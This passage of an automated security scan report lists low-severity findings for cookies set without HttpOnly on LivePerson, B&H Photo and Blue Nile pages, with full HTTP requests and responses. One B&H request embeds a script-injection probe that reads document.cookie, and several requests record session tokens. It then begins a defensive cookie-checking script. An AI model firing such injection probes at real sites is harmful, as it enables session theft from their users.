User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510908159

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Fri, 13 May 2011 18:23:05 GMT
Content-Length: 8868
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDAQDSSTRR=ACJDBBFDGDPABJDMIHHAPGKH; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 1402662
lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=typingInvitationText

if( typeof( lpMTagConfig.plugins ) == 'undefined' ) {
   lpMTagConfig.plugins =
...[SNIP]...

13.7. http://sales.liveperson.net/visitor/addons/deploy.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The cookie set in the response's Set-Cookie header was issued by the application without the HttpOnly flag. It appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=46281118&d_id=service-petco HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC; HumanClickACTIVE=1305511139578

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:13:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Fri, 13 May 2011 18:23:05 GMT
Content-Length: 14862
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSQQDDBBA=CGMPNJDBEFBPCPENKNIKNPEG; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 46281118
lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=sendLPVarsFromPage,genericEventsBridge
if (typeof(lpMTagConfig.plugins)=='undefined') { lpMTagConfig
...[SNIP]...

13.8. https://secure.bhphotovideo.com/bnh/controller/home

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The cookies set in the response's Set-Cookie headers were issued by the application without the HttpOnly flag. At least one of them appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1 HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 11:06:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 11:06:56 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=nr1QNRFMzp!1551726241; domain=bhphotovideo.com; path=/
Set-Cookie: cookieID=18171364821305544044440; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:21:31 GMT; path=/
Set-Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530; Path=/
Content-Length: 30873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...

13.9. https://secure.bluenile.com/926308692/bundles/core.js

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.bluenile.com
Path:   /926308692/bundles/core.js

Issue detail

The cookie set in the response's Set-Cookie header was issued by the application without the HttpOnly flag. It appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookie to determine its function.

Request

GET /926308692/bundles/core.js HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; JSESSIONID=C428FA1310BECEF5684ADEE95F231C12; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Date: Mon, 16 May 2011 01:58:45 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Expires: Sun, 16 May 2021 01:58:48 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=F2B3F127105095FA0FA90CE2FE7A6C84; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 141182

LoadState=function(){return{arrDOMLoadQueue:[],arrUnLoadQueue:[],arrLoadQueue:[],arrLoadTimes:[],arrFinished:[],done:false,timer:null,behaviours_done:true,addToLoadQueue:function(B,C,A){this.behaviour
...[SNIP]...

13.10. https://secure.bluenile.com/984568475/css/footer.css

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.bluenile.com
Path:   /984568475/css/footer.css

Issue detail

The cookie set in the response's Set-Cookie header was issued by the application without the HttpOnly flag. It appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookie to determine its function.

Request

GET /984568475/css/footer.css HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
Cache-Control: max-age=0
If-Modified-Since: Sun, 06 Nov 2005 12:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: 2740050219
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; testcookie=; __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; JSESSIONID=BD3C1F2214BB0D9BDAA225DE12F8DC7A; stc=3NZR3Q

Response

HTTP/1.1 304 Not Modified
Content-Length: 0
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=3EF299F7A8884324F97ECFB6EE6789CF; Path=/; Secure
Date: Mon, 16 May 2011 10:18:57 GMT


13.11. https://secure.bluenile.com/N1374326862/bundles/cart.css

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.bluenile.com
Path:   /N1374326862/bundles/cart.css

Issue detail

The cookie set in the response's Set-Cookie header was issued by the application without the HttpOnly flag. It appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookie to determine its function.

Request

GET /N1374326862/bundles/cart.css HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; JSESSIONID=C428FA1310BECEF5684ADEE95F231C12; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Date: Mon, 16 May 2011 01:58:36 GMT
Content-Type: text/css;charset=ISO-8859-1
Expires: Sun, 16 May 2021 01:58:39 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=D13F3BAEE89FC25F9DABFECE8CDD8C0E; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 48865

.content H4, #sign-in-overlay h4, #sign-in-overlay h3{margin:0 0 10px 0;font-size:18px;font-weight:normal;color:#152551;font-variant:small-caps;font-family:"Times New Roman", Times, serif;}p, li, h1,
...[SNIP]...

13.12. https://secure.bluenile.com/N1991330425/js/navigation_flyouts_menu.js

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.bluenile.com
Path:   /N1991330425/js/navigation_flyouts_menu.js

Issue detail

The cookie set in the response's Set-Cookie header was issued by the application without the HttpOnly flag. It appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookie to determine its function.

Request

GET /N1991330425/js/navigation_flyouts_menu.js HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; testcookie=; __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; JSESSIONID=BD3C1F2214BB0D9BDAA225DE12F8DC7A; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Date: Mon, 16 May 2011 10:18:56 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Expires: Sun, 16 May 2021 10:18:58 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=9469FAAE73DD1B8776560654EE6CD4D3; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 7197

$(document).ready(function(){var D=$("#bn_page_data").attr("data-site-server-name");D=(D===undefined)?"":D;if(D!=""&&D.indexOf("http")==-1){D="http://"+D}var E=$("#bn_page_data").attr("data-site-secur
...[SNIP]...

13.13. https://secure.bluenile.com/N3371804/bundles/allpages.js

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.bluenile.com
Path:   /N3371804/bundles/allpages.js

Issue detail

The cookie set in the response's Set-Cookie header was issued by the application without the HttpOnly flag. It appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookie to determine its function.

Request

GET /N3371804/bundles/allpages.js HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; testcookie=; __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; JSESSIONID=BD3C1F2214BB0D9BDAA225DE12F8DC7A; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Date: Mon, 16 May 2011 10:18:58 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Expires: Sun, 16 May 2021 10:19:00 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=72FEB7F4A023220F2EC65B8F2F2CEFA4; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 12134

var BN=function(){var A={};A.namespace=function(B){if(A[B]==undefined){A[B]={}}};return A}();try{console.assert(1)}catch(e){console={log:function(){},assert:function(){},warn:function(){}}}$.ajaxSetup
...[SNIP]...

13.14. https://secure.bluenile.com/N3821919/bundles/footer.js

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.bluenile.com
Path:   /N3821919/bundles/footer.js

Issue detail

The cookie set in the response's Set-Cookie header was issued by the application without the HttpOnly flag. It appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookie to determine its function.

Request

GET /N3821919/bundles/footer.js HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; JSESSIONID=C428FA1310BECEF5684ADEE95F231C12; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Date: Mon, 16 May 2011 01:58:36 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Expires: Sun, 16 May 2021 01:58:39 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=5FF1A92F04EB693216D82D74D5A4299B; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 129785

BN.namespace("footer");BN.namespace("footer.facebook");BN.namespace("footer.overlay");BN.namespace("footer.international");$(document).ready(function(){BN.footer.showingSpecialOfferModule=($("#special
...[SNIP]...

13.15. https://secure.bluenile.com/N518116487/bundles/allpages.css

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.bluenile.com
Path:   /N518116487/bundles/allpages.css

Issue detail

The cookie set in the response's Set-Cookie header was issued by the application without the HttpOnly flag. It appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookie to determine its function.

Request

GET /N518116487/bundles/allpages.css HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; JSESSIONID=C428FA1310BECEF5684ADEE95F231C12; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Date: Mon, 16 May 2011 01:58:36 GMT
Content-Type: text/css;charset=ISO-8859-1
Expires: Sun, 16 May 2021 01:58:39 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=B5E235EBCC9DDACFB3C2FE48FA5D4CCF; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 30549

.alignRight{text-align:right}.alignLeft{text-align:left}.alignCenter{text-align:center;}.block{display:block;}.buttonLg{background:transparent url(https://secure.footprint.net/bnsecure/assets/chrome/b
...[SNIP]...

13.16. https://secure.bluenile.com/N522719515/bundles/ga.js

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.bluenile.com
Path:   /N522719515/bundles/ga.js

Issue detail

The cookie set in the response's Set-Cookie header was issued by the application without the HttpOnly flag. It appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookie to determine its function.

Request

GET /N522719515/bundles/ga.js HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; JSESSIONID=C428FA1310BECEF5684ADEE95F231C12; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Date: Mon, 16 May 2011 01:58:34 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Expires: Sun, 16 May 2021 01:58:37 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=A065C1EE3514BFC48CEC05FA8520967F; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 24440

(function(){var u="_gat",AK="_gaq",AJ=true,AI=false,AH=undefined,AD="4.5.7",AG="length",AF="cookie",t="location",r="&",q="=",p="__utma=",o="__utmb=",n="__utmc=",x="__utmk=",m="__utmv=",l="__utmz=",k="
...[SNIP]...

13.17. https://secure.bluenile.com/N688855944/css/cart_print.css

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.bluenile.com
Path:   /N688855944/css/cart_print.css

Issue detail

The cookie set in the response's Set-Cookie header was issued by the application without the HttpOnly flag. It appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookie to determine its function.

Request

GET /N688855944/css/cart_print.css HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
Cache-Control: max-age=0
If-Modified-Since: Sun, 06 Nov 2005 12:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: 2740050219
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; testcookie=; __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; JSESSIONID=BD3C1F2214BB0D9BDAA225DE12F8DC7A; stc=3NZR3Q

Response

HTTP/1.1 304 Not Modified
Content-Length: 0
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=C41065F23F1B09EAE20BE963A0C9B108; Path=/; Secure
Date: Mon, 16 May 2011 10:18:54 GMT


13.18. https://secure.bluenile.com/accounts/account-sign-in.html

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.bluenile.com
Path:   /accounts/account-sign-in.html

Issue detail

The cookies set in the response's Set-Cookie headers were issued by the application without the HttpOnly flag. At least one of them appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.

Request

GET /accounts/account-sign-in.html HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; pop=sweeps~1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=C4A385CE7874D0A2B551FC74E3744D04; Path=/; Secure
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:06:40 GMT; Path=/
Set-Cookie: SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; Domain=.bluenile.com; Expires=Tue, 15-May-2012 02:06:40 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 63219


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Your
...[SNIP]...

13.19. https://secure.bluenile.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.bluenile.com
Path:   /favicon.ico

Issue detail

The cookie set in the response's Set-Cookie header was issued by the application without the HttpOnly flag. It appears to contain a session token, which may increase the risk associated with this issue. Review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q; JSESSIONID=F2B3F127105095FA0FA90CE2FE7A6C84; testcookie=; __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.2.10.1305510928

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:02 GMT
Last-Modified: Wed, 11 May 2011 18:58:22 GMT
Accept-Ranges: bytes
ETag: W/"1406-1305140302000"
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=EA10D33975247F9BC51C69DD0D98B7B9; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 1406

..............h.......(....... ............................................................................................................................//..SS..kg.................................
...[SNIP]...
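
As an added example (not part of the XSS.CX report and not Burp Suite's own code), the following Python script applies the check that the findings in this section record: it parses the Set-Cookie headers of a raw HTTP response, reports cookies issued without HttpOnly (and, for an HTTPS origin, without Secure), and marks cookies whose names look like session or authentication tokens. The name pattern is an assumed approximation of the "appears to contain a session token" heuristic, not the scanner's published rule. The two sample responses are constructed, trimmed copies of the secure.bluenile.com and tracking.searchmarketing.com responses shown in this section.

```python
import re
from typing import Dict, List

# Constructed sample input: trimmed copies of two responses recorded in this
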